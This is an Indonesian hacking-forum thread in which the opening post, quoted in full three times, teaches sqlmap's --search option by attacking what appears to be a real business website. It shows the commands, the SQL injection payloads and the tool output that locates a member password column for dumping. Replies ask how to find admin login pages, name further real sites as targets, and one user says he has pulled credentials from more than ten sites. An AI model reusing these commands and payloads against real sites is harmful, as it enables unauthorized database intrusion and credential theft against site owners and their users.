Posts: 2,063
Threads: 95
Joined: Jun 2011
assalamualaikum wr wb
pagi semua
udah lama gak share trik2 and tips nih jadi kangen ^_^
humm kali ini mau berbagi tentang penggunaan sqlmap.
selama ini penggunaan sqlmap bisa dikatakan selalu seperti ini
(untuk contoh, jangan di pepes webnya)
Code: 1. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --random-agent --threads 10 --banner
lalu
junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 --dbs
atau
junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --dbs
2. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 -D dbname --tables
3. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 -D dbname -T tbl_name --columns
4. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 -D dbname -T tbl_name -C clm_name1,clm_name2,... --dump
nah disini
saya sudah tidak menggunakan tepat seperti langkah diatas.
saya menggunakan option --search untuk mencari langsung table login atau table yang mengindikasikan mempunyai kolom login atau password. jadi bisa menggantikan option --tables dan option --columns
ok langsung saja
Code: junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --threads 10 -D kingkitc_kkcdb --search -C pass,user
sqlmap/1.0-dev (r5131) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 05:54:43
[05:54:43] [INFO] using '/pentest/web/scanners/sqlmap/output/www.kingkitchen.co.th/session' as a session file
[05:54:43] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[05:54:43] [INFO] testing connection to the target url
[05:54:44] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: CID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: CID=14 AND 6999=6999
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: CID=14 AND (SELECT 2410 FROM(SELECT COUNT(*),CONCAT(0x3a686d633a,(SELECT (CASE WHEN (2410=2410) THEN 1 ELSE 0 END)),0x3a6177753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: CID=14 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a686d633a,0x6b595675485144425450,0x3a6177753a), NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: CID=14 AND SLEEP(5)
---
[05:54:44] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.64, PHP 5.2.9
back-end DBMS: MySQL 5.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
[05:54:46] [INFO] searching columns like 'pass' in database 'kingkitc_kkcdb'
[05:54:47] [INFO] the SQL query used returns 1 entries
[05:54:48] [INFO] retrieved: kingkitc_kkcdb
[05:54:48] [INFO] retrieved: MEMBER
[05:54:48] [INFO] fetching columns like 'pass' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:50] [INFO] the SQL query used returns 1 entries
[05:54:50] [INFO] retrieved: MPassword
[05:54:51] [INFO] retrieved: varchar(10)
[05:54:51] [INFO] searching columns like 'user' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:51] [INFO] fetching columns like 'user' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:53] [ERROR] unable to retrieve the columns for any table in database 'kingkitc_kkcdb'
Columns like 'user' were found in the following databases:
Columns like 'pass' were found in the following databases:
Database: kingkitc_kkcdb
Table: MEMBER
[1 column]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| MPassword | varchar(10) |
+-----------+-------------+
do you want to dump entries? [Y/n] n
[05:57:34] [INFO] fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/www.kingkitchen.co.th'
[*] shutting down at 05:57:34
option --search itu selalu diikut dengan option -C parameter1,parameter2,...[/code] dan option -T parameter1,parameter2,... atau penggunaan salah satunya.
Code: -C digunakan untuk pencarian nama column didalam database berdasarkan parameter yang dikirim/diberikan
-T digunakan untuk pencarian nama table didalam database berdasarkan parameter yang dikirim/diberikan
nah dari hasil kita langsung tau bukan nama tabelnya?
tinggal melakukan dumping pada tablenya langsung.
okok sekian dulu dari saya
udah jam 6 lewat ntar ane telat sekolah ^_^
junior mohon pamit
regards
junior dragon
(This post was last modified: 06-29-2012, 07:17 AM by Junior Riau.)
Posts: 15
Threads: 1
Joined: May 2012
wahhh..
keren..
oh ya, kalo cari login admin gimana ya om??
ane pake cara manual cnth: http://www.wedusgibas.com/admin
kadang bisa kadang gak.. kalo pake tools d BT namanya apa yah?? 
Posts: 2,544
Threads: 56
Joined: Jun 2011
thx buat sharenya +2 dari ane
Posts: 2,544
Threads: 56
Joined: Jun 2011
(06-29-2012, 06:51 PM)Daddes Wrote: wahhh..
keren..
oh ya, kalo cari login admin gimana ya om??
ane pake cara manual cnth: http://www.wedusgibas.com/admin
kadang bisa kadang gak.. kalo pake tools d BT namanya apa yah??
coba cari dirbuster
Posts: 2,063
Threads: 95
Joined: Jun 2011
(06-29-2012, 08:08 PM)konspirasi Wrote: thx buat sharenya +2 dari ane
baru masuk +1 om
Posts: 272
Threads: 12
Joined: May 2012
(06-29-2012, 07:13 AM)junior.riau18 Wrote: assalamualaikum wr wb
pagi semua
udah lama gak share trik2 and tips nih jadi kangen ^_^
humm kali ini mau berbagi tentang penggunaan sqlmap.
selama ini penggunaan sqlmap bisa dikatakan selalu seperti ini
(untuk contoh, jangan di pepes webnya)
Code: 1. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --random-agent --threads 10 --banner
lalu
junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 --dbs
atau
junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --dbs
2. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 -D dbname --tables
3. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 -D dbname -T tbl_name --columns
4. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 -D dbname -T tbl_name -C clm_name1,clm_name2,... --dump
nah disini
saya sudah tidak menggunakan tepat seperti langkah diatas.
saya menggunakan option --search untuk mencari langsung table login atau table yang mengindikasikan mempunyai kolom login atau password. jadi bisa menggantikan option --tables dan option --columns
ok langsung saja
Code: junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --threads 10 -D kingkitc_kkcdb --search -C pass,user
sqlmap/1.0-dev (r5131) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 05:54:43
[05:54:43] [INFO] using '/pentest/web/scanners/sqlmap/output/www.kingkitchen.co.th/session' as a session file
[05:54:43] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[05:54:43] [INFO] testing connection to the target url
[05:54:44] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: CID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: CID=14 AND 6999=6999
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: CID=14 AND (SELECT 2410 FROM(SELECT COUNT(*),CONCAT(0x3a686d633a,(SELECT (CASE WHEN (2410=2410) THEN 1 ELSE 0 END)),0x3a6177753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: CID=14 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a686d633a,0x6b595675485144425450,0x3a6177753a), NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: CID=14 AND SLEEP(5)
---
[05:54:44] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.64, PHP 5.2.9
back-end DBMS: MySQL 5.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
[05:54:46] [INFO] searching columns like 'pass' in database 'kingkitc_kkcdb'
[05:54:47] [INFO] the SQL query used returns 1 entries
[05:54:48] [INFO] retrieved: kingkitc_kkcdb
[05:54:48] [INFO] retrieved: MEMBER
[05:54:48] [INFO] fetching columns like 'pass' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:50] [INFO] the SQL query used returns 1 entries
[05:54:50] [INFO] retrieved: MPassword
[05:54:51] [INFO] retrieved: varchar(10)
[05:54:51] [INFO] searching columns like 'user' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:51] [INFO] fetching columns like 'user' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:53] [ERROR] unable to retrieve the columns for any table in database 'kingkitc_kkcdb'
Columns like 'user' were found in the following databases:
Columns like 'pass' were found in the following databases:
Database: kingkitc_kkcdb
Table: MEMBER
[1 column]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| MPassword | varchar(10) |
+-----------+-------------+
do you want to dump entries? [Y/n] n
[05:57:34] [INFO] fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/www.kingkitchen.co.th'
[*] shutting down at 05:57:34
option --search itu selalu diikut dengan option -C parameter1,parameter2,...[/code] dan option -T parameter1,parameter2,... atau penggunaan salah satunya.
Code: -C digunakan untuk pencarian nama column didalam database berdasarkan parameter yang dikirim/diberikan
-T digunakan untuk pencarian nama table didalam database berdasarkan parameter yang dikirim/diberikan
nah dari hasil kita langsung tau bukan nama tabelnya?
tinggal melakukan dumping pada tablenya langsung.
okok sekian dulu dari saya
udah jam 6 lewat ntar ane telat sekolah ^_^
junior mohon pamit
regards
junior dragon
mantap ni om, nice share
Posts: 63
Threads: 2
Joined: Apr 2012
Mantap nih om, lumayan nih nambah ilmu
root@zombie:~# echo gua ganteng thank you ) > /var/log/syslog
Posts: 929
Threads: 141
Joined: Jul 2011
wow akhirnya yg ane minta di posting juga
makasih jeng juni nan sexy, ada bahan bacaan lagi ni
plus 1 dr ane cek dispenser
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
Posts: 54
Threads: 1
Joined: Aug 2012
(06-29-2012, 07:13 AM)junior.riau18 Wrote: assalamualaikum wr wb
pagi semua
udah lama gak share trik2 and tips nih jadi kangen ^_^
humm kali ini mau berbagi tentang penggunaan sqlmap.
selama ini penggunaan sqlmap bisa dikatakan selalu seperti ini
(untuk contoh, jangan di pepes webnya)
Code: 1. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --random-agent --threads 10 --banner
lalu
junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 --dbs
atau
junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --dbs
2. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 -D dbname --tables
3. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 -D dbname -T tbl_name --columns
4. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 random-agent --threads 10 -D dbname -T tbl_name -C clm_name1,clm_name2,... --dump
nah disini
saya sudah tidak menggunakan tepat seperti langkah diatas.
saya menggunakan option --search untuk mencari langsung table login atau table yang mengindikasikan mempunyai kolom login atau password. jadi bisa menggantikan option --tables dan option --columns
ok langsung saja
Code: junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --threads 10 -D kingkitc_kkcdb --search -C pass,user
sqlmap/1.0-dev (r5131) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 05:54:43
[05:54:43] [INFO] using '/pentest/web/scanners/sqlmap/output/www.kingkitchen.co.th/session' as a session file
[05:54:43] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[05:54:43] [INFO] testing connection to the target url
[05:54:44] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: CID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: CID=14 AND 6999=6999
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: CID=14 AND (SELECT 2410 FROM(SELECT COUNT(*),CONCAT(0x3a686d633a,(SELECT (CASE WHEN (2410=2410) THEN 1 ELSE 0 END)),0x3a6177753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: CID=14 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a686d633a,0x6b595675485144425450,0x3a6177753a), NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: CID=14 AND SLEEP(5)
---
[05:54:44] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.64, PHP 5.2.9
back-end DBMS: MySQL 5.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
[05:54:46] [INFO] searching columns like 'pass' in database 'kingkitc_kkcdb'
[05:54:47] [INFO] the SQL query used returns 1 entries
[05:54:48] [INFO] retrieved: kingkitc_kkcdb
[05:54:48] [INFO] retrieved: MEMBER
[05:54:48] [INFO] fetching columns like 'pass' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:50] [INFO] the SQL query used returns 1 entries
[05:54:50] [INFO] retrieved: MPassword
[05:54:51] [INFO] retrieved: varchar(10)
[05:54:51] [INFO] searching columns like 'user' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:51] [INFO] fetching columns like 'user' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:53] [ERROR] unable to retrieve the columns for any table in database 'kingkitc_kkcdb'
Columns like 'user' were found in the following databases:
Columns like 'pass' were found in the following databases:
Database: kingkitc_kkcdb
Table: MEMBER
[1 column]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| MPassword | varchar(10) |
+-----------+-------------+
do you want to dump entries? [Y/n] n
[05:57:34] [INFO] fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/www.kingkitchen.co.th'
[*] shutting down at 05:57:34
option --search itu selalu diikut dengan option -C parameter1,parameter2,...[/code] dan option -T parameter1,parameter2,... atau penggunaan salah satunya.
Code: -C digunakan untuk pencarian nama column didalam database berdasarkan parameter yang dikirim/diberikan
-T digunakan untuk pencarian nama table didalam database berdasarkan parameter yang dikirim/diberikan
nah dari hasil kita langsung tau bukan nama tabelnya?
tinggal melakukan dumping pada tablenya langsung.
okok sekian dulu dari saya
udah jam 6 lewat ntar ane telat sekolah ^_^
junior mohon pamit
regards
junior dragon
mantab ne tipsnya 
kalau ww.capjikia.com/admin bisa gak to om
Posts: 88
Threads: 25
Joined: Feb 2012
APakah bisa skrang ini password yang kita dapat selalu dalam enkripsi dan selalu salah ketika mau decrypt
coba login di webnya tidak cocok sama yang di dapat sqli
ada solusi
ini sudah saya praktekkan pada banyak situs lebih dari 10 situs sudah dapat pass dan user nya tapi saya na'as belum pernah bisa login ke situs yang telah saya uji dengan sqlmap ataupun havij
|
